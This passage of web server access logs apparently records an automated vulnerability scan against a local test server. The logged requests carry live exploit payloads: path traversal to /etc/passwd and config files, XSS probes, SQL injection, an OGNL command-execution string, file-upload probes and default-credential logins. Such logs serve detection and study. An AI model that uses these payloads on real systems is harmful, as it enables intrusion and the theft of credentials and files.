HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /telescope/requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.207","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/vars HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 297MbDe7eMm5NuB3CeKTcdvCfFS\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x22297MbEgDS3TO2AkqcnRMzjGUC9k\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 